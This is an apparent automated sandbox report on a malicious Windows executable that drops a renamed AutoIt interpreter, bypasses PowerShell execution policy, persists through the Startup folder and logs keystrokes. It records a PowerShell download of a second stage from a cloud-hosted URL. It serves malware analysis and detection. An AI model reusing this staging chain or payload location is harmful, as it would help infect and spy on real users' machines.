Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1528956
MD5: 1d2cf62e7874bb460b7258279a55ddf3
SHA1: 9a060f273aee924d7972a5ddd561a34f4510d64d
SHA256: c5378718434462185d98c672106dbfd4efbc8d6b7a0c60efe79000f11c955ffa
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString, GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: file.exe ReversingLabs: Detection: 31%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.6% probability
Source: file.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 83.140.241.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7978AB7C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00007FF7978B72A8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B71F4 FindFirstFileW,FindClose, 0_2_00007FF7978B71F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978ABC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7978ABC70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA874 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00007FF7978BA874
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00007FF7978AC7C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF7978BA4F8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B6428 FindFirstFileW,FindNextFileW,FindClose, 0_2_00007FF7978B6428
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose, 0_2_00007FF7978BA350
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797872F50 FindFirstFileExW, 0_2_00007FF797872F50
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_004C4005
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C494A GetFileAttributesW,FindFirstFileW,FindClose, 3_2_004C494A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_004CC2FF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CCD14 FindFirstFileW,FindClose, 3_2_004CCD14
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 3_2_004CCD9F
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_004CF5D8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 3_2_004CF735
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004CFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 3_2_004CFA36
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 3_2_004C3CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F84005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F84005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8494A GetFileAttributesW,FindFirstFileW,FindClose, 8_2_00F8494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00F8C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 8_2_00F8CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8CD14 FindFirstFileW,FindClose, 8_2_00F8CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F8FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 8_2_00F8FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F83CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F83CE2
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic HTTP traffic detected:
GET /v1/ws2/:updatemake/:reality/reality.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: my.cloudme.com
Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978BE87C InternetReadFile, 0_2_00007FF7978BE87C
Source: global traffic DNS traffic detected: DNS query: my.cloudme.com
Source: global traffic DNS traffic detected: DNS query: nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D887000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1809510030.000001C71DC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2033706127.000001C734A92000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2950931190.0000000000529000.00000002.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2021600603.000001C73479E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.co-
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloH
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D11F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloudme.com
Source: powershell.exe, 00000001.00000002.1809510030.000001C71C4B7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://my.cloudme.com/v1/ws2/:updatemake/:reality/reality.txt
Source: powershell.exe, 00000001.00000002.1809510030.000001C71DC7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1822512403.000001C72C304000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.1809510030.000001C71D8F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp, InformationCheck.exe, 00000003.00000002.2956313395.0000000004AE0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00007FF7978C0D24
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004D4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 3_2_004D4830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F94830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_00F94830
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00007FF7978C0A6C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978A7E64 GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00007FF7978A7E64
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004ED164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 3_2_004ED164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FAD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 8_2_00FAD164

System Summary

Source: C:\Users\user\Desktop\file.exe Code function: This is a third-party compiled AutoIt script. 0_2_00007FF7978337B0
Source: file.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_94912b12-4
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AC110: CreateFileW,DeviceIoControl,CloseHandle, 0_2_00007FF7978AC110
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789D2C4 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock, 0_2_00007FF79789D2C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 0_2_00007FF7978AD750
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 3_2_004C5778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F85778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 8_2_00F85778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F56502 8_2_00F56502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F2E6F0 8_2_00F2E6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F5265E 8_2_00F5265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4282A 8_2_00F4282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F589BF 8_2_00F589BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F56A74 8_2_00F56A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FA0A3A 8_2_00FA0A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F30BE0 8_2_00F30BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F7EDB2 8_2_00F7EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4CD51 8_2_00F4CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FA0EB7 8_2_00FA0EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F88E44 8_2_00F88E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F56FE6 8_2_00F56FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F433B7 8_2_00F433B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F3D45D 8_2_00F3D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4F409 8_2_00F4F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F416B4 8_2_00F416B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F2F6A0 8_2_00F2F6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F21663 8_2_00F21663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F3F628 8_2_00F3F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F478C3 8_2_00F478C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4DBA5 8_2_00F4DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F41BA8 8_2_00F41BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F59CE5 8_2_00F59CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F3DD28 8_2_00F3DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4BFD6 8_2_00F4BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F41FC0 8_2_00F41FC0
Source: Joe Sandbox View Dropped File: C:\Users\Public\InformationCheck.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Note: both dropped files carry the same SHA256, so SwiftWrite.pif is a byte-identical copy of InformationCheck.exe under a .pif name. The process tree below shows InformationCheck.exe being started with C:\Users\Public\Details.au3 as its argument, consistent with a renamed AutoIt3 interpreter executing a dropped script.
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 00F40D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 00F48B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 00F31A36 appears 34 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00488B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00471A36 appears 34 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00480D17 appears 70 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00007FF797858D58 appears 76 times
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: classification engine Classification label: mal100.expl.evad.winEXE@12/10@3/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B3778 GetLastError,FormatMessageW, 0_2_00007FF7978B3778
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00007FF79789D5CC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789CCE0 AdjustTokenPrivileges,CloseHandle, 0_2_00007FF79789CCE0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004B8DE9 AdjustTokenPrivileges,CloseHandle, 3_2_004B8DE9
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 3_2_004B9399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F78DE9 AdjustTokenPrivileges,CloseHandle, 8_2_00F78DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F79399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 8_2_00F79399
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B58C4 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00007FF7978B58C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978ABE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00007FF7978ABE00
